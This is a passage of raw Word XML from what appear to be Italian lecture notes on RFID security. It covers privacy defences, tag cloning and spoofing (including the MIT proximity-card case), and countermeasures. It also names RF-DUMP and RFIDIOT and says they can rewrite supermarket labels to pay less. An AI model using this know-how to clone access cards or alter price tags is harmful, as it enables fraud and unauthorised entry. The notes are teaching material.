        </w:rPr>
        <w:t xml:space="preserve"> D</w:t>
      </w:r>
      <w:r w:rsidR="00B3060B" w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">isattivare i </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B3060B" w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B3060B" w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> quando escono dal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>luogo di interesse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B3060B" w:rsidRPr="00B3060B" w:rsidRDefault="00B3060B" w:rsidP="00B3060B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>- Semplice, le persone possono capirlo e fidarsi</w:t>
      </w:r>
      <w:r w:rsidR="00162D37">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>nega il</w:t>
      </w:r>
      <w:r w:rsidR="00162D37">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>servizio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B3060B" w:rsidRPr="00B3060B" w:rsidRDefault="00B3060B" w:rsidP="00B3060B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t> Creazione di “schermature”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B3060B" w:rsidRPr="00B3060B" w:rsidRDefault="00B3060B" w:rsidP="00B3060B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- Anche qui comprensibile, ma può funzionare solo per i </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B3060B" w:rsidRPr="00B3060B" w:rsidRDefault="00B3060B" w:rsidP="00B3060B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>che stanno in un contenitore (es. portafoglio)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B3060B" w:rsidRPr="00B3060B" w:rsidRDefault="00B3060B" w:rsidP="00B3060B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> “RFID </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>blocker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>”, interferenza</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B3060B" w:rsidRPr="00B3060B" w:rsidRDefault="00B3060B" w:rsidP="00B3060B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Denial</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> of service sul lettore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00544173" w:rsidRDefault="00B3060B" w:rsidP="00B3060B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>- Un dispositivo aggiuntivo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00544173" w:rsidRDefault="00544173" w:rsidP="00B3060B">
      <w:pPr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poliche</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00544173" w:rsidRDefault="00544173" w:rsidP="00B3060B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00544173">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>“Leggere” non è grave come “correlare”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B3060B" w:rsidRPr="00B3060B" w:rsidRDefault="00544173" w:rsidP="00B3060B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00544173">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>- Difendersi mediante la limitazione dei dati</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F40DC6" w:rsidRDefault="00F40DC6" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F40DC6" w:rsidRDefault="00F40DC6" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F40DC6" w:rsidRDefault="00F40DC6" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F40DC6" w:rsidRDefault="00F40DC6" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F00982" w:rsidRPr="00A4657F" w:rsidRDefault="00F00982" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB7A7F" w:rsidRDefault="00F00982" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A4657F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(b) Attacchi di “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A4657F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>spoofing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A4657F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>” o clonazione</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB7A7F" w:rsidRDefault="00EB7A7F" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB7A7F" w:rsidRPr="00EB7A7F" w:rsidRDefault="00EB7A7F" w:rsidP="00EB7A7F">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB7A7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Alcuni </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB7A7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB7A7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>, in particolare quelli “scrivibili”, possono</w:t>
      </w:r>
      <w:r w:rsidR="00F40DC6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB7A7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">essere clonati o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB7A7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>ri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB7A7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>-etichettati</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB7A7F" w:rsidRPr="00EB7A7F" w:rsidRDefault="00EB7A7F" w:rsidP="00EB7A7F">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB7A7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t> Altri, quelli “unici”, possono essere clonati a livello radio,</w:t>
      </w:r>
      <w:r w:rsidR="00F40DC6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB7A7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>in quanto si limitano ad enunciare la propria identità</w:t>
      </w:r>
      <w:r w:rsidR="00F40DC6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB7A7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>senza autenticazione</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB7A7F" w:rsidRPr="00EB7A7F" w:rsidRDefault="00EB7A7F" w:rsidP="00EB7A7F">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB7A7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t> Scenari d'attacco</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB7A7F" w:rsidRPr="00EB7A7F" w:rsidRDefault="00EB7A7F" w:rsidP="00EB7A7F">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB7A7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>- Modifica di etichette in documenti per falsificarli</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB7A7F" w:rsidRPr="00EB7A7F" w:rsidRDefault="00EB7A7F" w:rsidP="00EB7A7F">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB7A7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>- Modifica di un EPC per pagare meno</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB7A7F" w:rsidRPr="00EB7A7F" w:rsidRDefault="00EB7A7F" w:rsidP="00EB7A7F">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB7A7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>- Modifica di etichette per frodare sistemi di e-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB7A7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>payment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00EB7A7F" w:rsidRPr="00EB7A7F" w:rsidRDefault="00EB7A7F" w:rsidP="00EB7A7F">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB7A7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>- Modifica di etichette o di segnali, generazione di segnali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB7A7F" w:rsidRPr="00EB7A7F" w:rsidRDefault="00EB7A7F" w:rsidP="00EB7A7F">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB7A7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>spurii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB7A7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> per alterare sistemi di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB7A7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>inventory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00EB7A7F" w:rsidRDefault="00EB7A7F" w:rsidP="00EB7A7F">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB7A7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB7A7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Skimming</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB7A7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> di antifurti, sistemi di pagamento, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE4B69" w:rsidRDefault="00FE4B69" w:rsidP="00EB7A7F">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FE4B69" w:rsidRDefault="00FE4B69" w:rsidP="00EB7A7F">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>esempio di attacco :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00103705" w:rsidRDefault="00103705" w:rsidP="00EB7A7F">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00103705">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MIT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00103705">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Proximity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00103705">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Card</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> da parte dei studenti </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00103705">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Josh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00103705">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00103705">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Mandel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00103705">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, Austin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00103705">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Roach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00103705">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, Keith </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00103705">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Winstein</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00103705" w:rsidRDefault="00103705" w:rsidP="00EB7A7F">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>La card serviva per entrare all’interno dei laboratori riservati del MIT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00103705" w:rsidRDefault="00103705" w:rsidP="00EB7A7F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4082743" cy="1572895"/>
            <wp:effectExtent l="25400" t="0" r="6657" b="0"/>
            <wp:docPr id="2" name="Immagine 1" descr="::Schermata 2010-04-27 a 15.1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Schermata 2010-04-27 a 15.16.0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43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05" w:rsidRDefault="00103705" w:rsidP="00EB7A7F">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Tramite uno studio del segnale che emetteva la card gli studenti del MIT hanno ricreato un trasmettitore con appena 30$</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB7A7F" w:rsidRDefault="00103705" w:rsidP="00EB7A7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2720340" cy="2040255"/>
            <wp:effectExtent l="2540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05" w:rsidRDefault="00103705" w:rsidP="00EB7A7F">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Ulteriore esempio:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00103705" w:rsidRDefault="00103705" w:rsidP="00EB7A7F">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00103705">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>RF-DUMP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00103705" w:rsidRDefault="00103705" w:rsidP="00EB7A7F">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Al sito </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidR="006A4E7F" w:rsidRPr="00A4067D">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://www.rf-dump.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006A4E7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> è possibile scarica un programma open source scritto da un programmatore tedesco per tutte le piattaforme con il quale è possibile</w:t>
      </w:r>
      <w:r w:rsidR="006A4E7F" w:rsidRPr="006A4E7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> leggere/scrivere ISO </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A4E7F" w:rsidRPr="006A4E7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A4E7F" w:rsidRPr="006A4E7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> e Smart-Label</w:t>
      </w:r>
      <w:r w:rsidR="006A4E7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> tramite un semplice trasmettitore. Tramite questo semplice programma è possibile riscrivere quindi le etichette dei supermercati e pagare meno il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A4E7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>philadelfia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F00982" w:rsidRPr="00EB7A7F" w:rsidRDefault="006A4E7F" w:rsidP="00EB7A7F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3660127" cy="2755945"/>
            <wp:effectExtent l="2540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27" cy="275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7F" w:rsidRDefault="006A4E7F" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>altro esempio:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F579C" w:rsidRDefault="006A4E7F" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A4E7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sul sit </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="006A4E7F">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:bCs/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>http://rfidiot.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006A4E7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> è possibile scaricare (e comprare lettore) un semplice programma scritto in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A4E7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>pyton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A4E7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> che permette di modificare, esplorare qualsiasi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A4E7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>RFid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A4E7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A4E7F" w:rsidRDefault="005F579C" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>CONTROMISURE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F579C" w:rsidRPr="005F579C" w:rsidRDefault="005F579C" w:rsidP="005F579C">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F579C">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Tutte le forme di protezione della riservatezza aiutano a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F579C" w:rsidRPr="005F579C" w:rsidRDefault="005F579C" w:rsidP="005F579C">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F579C">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>contrastare la clonazione</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F579C" w:rsidRPr="005F579C" w:rsidRDefault="005F579C" w:rsidP="005F579C">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F579C">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t> Autenticazione attiva</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F579C" w:rsidRPr="005F579C" w:rsidRDefault="005F579C" w:rsidP="005F579C">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F579C">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- Richiede </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F579C">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F579C">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> costosi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F579C" w:rsidRPr="005F579C" w:rsidRDefault="005F579C" w:rsidP="005F579C">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F579C">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t> Autenticazione “passiva” (dati sul chip “firmati” da autorità)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F579C" w:rsidRPr="005F579C" w:rsidRDefault="005F579C" w:rsidP="005F579C">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F579C">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>- Non contrasta clonazione</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F579C" w:rsidRPr="005F579C" w:rsidRDefault="005F579C" w:rsidP="005F579C">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F579C">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F579C">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Track</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F579C">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and trace</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F579C" w:rsidRDefault="005F579C" w:rsidP="005F579C">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F579C">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F579C">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Anomaly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F579C">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F579C">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>detection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F579C">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>, a posteriori: problema privacy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F579C" w:rsidRDefault="005F579C" w:rsidP="005F579C">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006A4E7F" w:rsidRPr="006A4E7F" w:rsidRDefault="006A4E7F" w:rsidP="005F579C">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B867FE" w:rsidRDefault="00F00982" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A4657F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
